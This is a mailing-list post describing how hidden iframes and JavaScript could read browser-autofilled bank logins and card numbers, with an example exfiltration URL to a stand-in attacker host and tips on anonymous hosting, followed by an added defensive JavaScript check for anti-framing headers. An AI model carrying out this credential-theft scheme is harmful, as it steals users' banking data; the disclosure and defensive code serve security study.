I was wondering if anyone here knew that this was possible and that, according to some sources, this is one of the reasons it wasn't implemented in Chrome:

I thought of this over two years ago; yet, never did anything with it (lazy... really lazy... plus I am not a criminal).

Flash banners that inject JavaScript, XSS-exploited forms, or outright malicious websites can place hidden iframes that load a bunch of bank login sites and, using JavaScript, take advantage of autocomplete form-fill functions that require no user interaction, by reading the value of the input fields. Once you have the user's card# or login and pass, you can dynamically create and load a script tag with the src set to http://your_free_geocities_site_with_false_hotmail_signin_info/trackinfo.php?bankid=blah&bankcard=blah&pass=blah and you have sent the data to a remote location. If interaction is required for the autocomplete function to work, get JavaScript to cycle through the ASCII and cycle focus back and forth from the field till there is a value change.

The user would of course have signed up for a Hotmail account, through a proxy, and used that Hotmail account to set up a GeoCities account. I know this wouldn't get everyone; yet, if you put it on a linkshare site, I am betting a hacker could just watch the collected info pour in.

I got it to work on my laptop for a locally hosted site (I won't tell with what browser and what parameters), and I am thinking about submitting a proof of concept; yet, I am wondering if anyone else wrote about this first, if I just missed it, and if there is someone else's proof of concept it would look like I was ripping off?
_______________________________________________
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
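
The scenario in the message above depends on a login page rendering inside a hidden iframe on someone else's site. As an added example (not part of the original message), this JavaScript checks whether a response's headers forbid that framing; the function names, hosts and header sets are constructed for illustration.

```javascript
'use strict';

// Decide whether a response may be rendered inside another site's iframe.
// `headers` is a plain object: response header name -> value.
function framingVerdict(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);

  // X-Frame-Options: DENY and SAMEORIGIN both stop third-party framing.
  // The obsolete ALLOW-FROM form is ignored by current browsers, so it does not count.
  const xfo = (h['x-frame-options'] || '').split(',').map(t => t.trim().toUpperCase());
  if (xfo.includes('DENY') || xfo.includes('SAMEORIGIN')) {
    return { framable: false, reason: 'X-Frame-Options' };
  }

  // CSP frame-ancestors: a comma separates policies, a semicolon separates directives.
  // Only the enforcing header is read; the Report-Only variant blocks nothing.
  for (const policy of (h['content-security-policy'] || '').split(',')) {
    const fa = policy.split(';').map(d => d.trim().split(/\s+/))
      .find(d => d[0].toLowerCase() === 'frame-ancestors');
    if (!fa) continue;
    const sources = fa.slice(1).map(s => s.toLowerCase());
    // Strict reading (an assumption of this example): only 'none', 'self' or an
    // empty source list counts as protected; host or scheme allow-lists are flagged.
    if (sources.every(s => s === "'none'" || s === "'self'")) {
      return { framable: false, reason: 'CSP frame-ancestors' };
    }
  }
  return { framable: true, reason: 'no frame restriction found' };
}

// Constructed sample responses (hosts and headers are made up).
const SAMPLE_RESPONSES = [
  { url: 'https://a.example/login', headers: { 'X-Frame-Options': 'DENY' } },
  { url: 'https://b.example/login',
    headers: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self'" } },
  { url: 'https://c.example/login',
    headers: { 'Content-Security-Policy': "default-src 'self'",
               'X-Frame-Options': 'ALLOW-FROM https://partner.example' } },
  { url: 'https://d.example/login', headers: {} },
  { url: 'https://e.example/login',
    headers: { 'Content-Security-Policy': 'frame-ancestors https:' } },
];

// Return the URLs whose responses could still be embedded by a third-party page.
function framableUrls(responses) {
  return responses.filter(r => framingVerdict(r.headers).framable).map(r => r.url);
}
```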
